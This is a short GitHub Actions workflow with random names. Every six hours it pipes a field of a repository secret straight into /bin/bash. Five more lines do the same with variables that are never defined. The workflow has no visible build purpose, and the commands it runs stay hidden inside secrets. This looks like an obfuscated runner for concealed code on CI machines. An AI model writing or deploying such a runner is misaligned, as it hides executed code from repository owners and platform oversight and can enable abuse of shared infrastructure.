name: charcoalterrorist

on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: charcoalterrorist
        env:
          ls790: ${{ secrets.ls790 }}
        run: |
          echo $ls790 | jq -r .tcsrh0 | /bin/bash
          echo $yjf0752 | jq -r .aix4 | /bin/bash
          echo $e6889 | jq -r .j4897 | /bin/bash
          echo $lyr90468 | jq -r .aoc718 | /bin/bash
          echo $vriod02288 | jq -r .ycmx108 | /bin/bash
          echo $cavng31781 | jq -r .d56 | /bin/bash

